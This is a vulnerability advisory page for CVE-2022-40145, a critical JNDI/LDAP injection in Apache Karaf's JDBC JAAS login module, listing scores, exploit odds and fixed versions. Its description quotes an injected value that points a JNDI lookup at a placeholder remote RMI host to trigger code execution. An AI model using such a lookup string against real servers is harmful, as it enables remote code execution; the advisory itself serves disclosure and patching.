Vulnerability · Published Dec 21, 2022 · Assigned by apache

CVE-2022-40145Apache Karaf: JDBC JAAS LDAP injection

Critical 9.8

In plain English

A critical-severity injection in Apache Karaf from Apache Software Foundation. There are no confirmed reports of exploitation so far. The chance it is exploited in the next 30 days is estimated at 2.6% (higher than 85% of all known vulnerabilities). Fixed versions are available - upgrade the affected package.

Severity (CVSS 3.1)9.8Critical
Exploit odds (30 days)2.6%top 14.6% of all CVEs
Exploited in the wildNo reportsCISA SSVC: none
Attack toolingNoneno public tooling known

Official description

This vulnerable is about a potential code injection when an attacker has control of the target LDAP server using in the JDBC JNDI URL. The function jaas.modules.src.main.java.porg.apache.karaf.jass.modules.jdbc.JDBCUtils#doCreateDatasource use InitialContext.lookup(jndiName) without filtering. An user can modify `options.put(JDBCUtils.DATASOURCE, "osgi:" + DataSource.class.getName());` to `options.put(JDBCUtils.DATASOURCE,"jndi:rmi://x.x.x.x:xxxx/Command");` in JdbcLoginModuleTest#setup. This is vulnerable to a remote code execution (RCE) attack when a configuration uses a JNDI LDAP data source URI when an attacker has control of the target LDAP server.This issue affects all versions of Apache Karaf up to 4.4.1 and 4.3.7. We encourage the users to upgrade to Apache Karaf at least 4.4.2 or 4.3.8

Affected packages & fixed versions

EcosystemPackageFixed inAdvisory
Mavenorg.apache.karaf:apache-karaf4.3.8GHSA-c2p4-8mvv-rwmv
Mavenorg.apache.karaf:apache-karaf4.4.2GHSA-c2p4-8mvv-rwmv

Affected products (as reported)

VendorProductVersions
Apache Software Foundation Apache Karaf 4.4.0 – before 4.4.20 – before 4.3.8

Weakness: CWE-74, CWE-20 · Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

References